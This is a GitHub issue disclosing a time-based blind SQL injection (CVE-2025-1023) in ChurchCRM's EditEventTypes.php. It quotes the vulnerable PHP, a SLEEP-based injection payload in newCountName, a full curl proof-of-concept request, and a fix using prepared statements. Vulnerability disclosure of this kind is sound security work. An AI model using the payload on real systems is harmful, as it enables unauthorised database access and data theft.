Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php #7246

Open
PenTeZtZMicZ opened this issue Feb 4, 2025 · 2 comments
Open

Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php #7246

PenTeZtZMicZ opened this issue Feb 4, 2025 · 2 comments
Assignees
@DawoudIO
Labels
bug

Comments

@PenTeZtZMicZ
Copy link

Severity:

Critical (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)

  • A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1023)

Authorization Required

  • Administrator or a user with permission to list event types

Description

A vulnerability exists in ChurchCRM that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion.

Exploiting the SQL Injection

Affected Asset:

  • http://<server_ip>/EditEventTypes.php

Vulnerable Source Code:

ctid = mb_substr($_POST['Action'], 7);
    $sSQL = "DELETE FROM eventcountnames_evctnm WHERE evctnm_countid='$ctid' LIMIT 1";
    RunQuery($sSQL);
} else {
    switch ($_POST['Action']) {
        case 'ADD':
            $newCTName = $_POST['newCountName'];
            $theID = $_POST['EN_tyid'];
            $sSQL = "INSERT eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES ('$theID','$newCTName')";
            RunQuery($sSQL);
            break;

Steps to Reproduce:

  1. Navigate to the EditEventTypes endpoint: http://<server_ip>/EditEventTypes.php
  2. Intercept the request using a tool like Burp Suite or manually craft a request.
  3. Modify the newCountName parameter with the following SQL Injection payload: 
    4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS
  4. Observe the response time delay, indicating that SQL Injection is possible.

Proof of Concept (PoC):

Exploiting Time-Based Blind SQL Injection

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
    -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' \
    -H $'Content-Type: application/x-www-form-urlencoded' \
    -H $'Content-Length: 175' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' \
    -H $'Referer: http://<server_ip>/EditEventTypes.php' \
    -H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
    -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
    -b $'<CRM-Cookie>' \
    --data-binary $'EN_tyid=1&EN_ctid=&newEvtName=Church%20Service&newEvtStartTime=10:30:00&newCountName=4\'%20AND%20(SELECT%206419%20FROM%20(SELECT(SLEEP(5)))PYsF)%20AND%20\'KmGS\'\=\'KmGS&Action=ADD' \
    $'http://<server_ip>/EditEventTypes.php'

Observed Response:

  • The request results in a 5-second delay, confirming the SQL Injection vulnerability.

Impact:

  • Data Exfiltration: Attackers can dump the database and retrieve sensitive data, such as user credentials and admin tokens.
  • Database Manipulation: Attackers can modify, delete, or corrupt important data.
  • Remote Code Execution (RCE) Possibility: Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.

Recommended Fix:

  • Use prepared statements (parameterized queries) to prevent SQL Injection. Example: 
    $stmt = $pdo->prepare("INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)");
$stmt->execute([$theID, $newCTName]);
  • Implement input validation to reject dangerous characters.
  • Apply principle of least privilege to database users to limit damage from SQL Injection.
  • Adding Data Type Assignment in PHP for the newCountName variable. E.g. if it is a name, change it to Int

Environment:

  • Application: ChurchCRM 5.13.0
  • Tested on: Provided Docker in release
@PenTeZtZMicZ PenTeZtZMicZ changed the title (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php Feb 4, 2025
@DawoudIO DawoudIO self-assigned this Feb 5, 2025
@DawoudIO
Copy link
Contributor

DawoudIO commented Feb 5, 2025

Let me take a look this week

@PenTeZtZMicZ
Copy link
Author

I forgot to include, but I went beyond a sleep SQLi test and dumped the database from the SQLi

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@DawoudIO DawoudIO

Labels
bug
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@DawoudIO @PenTeZtZMicZ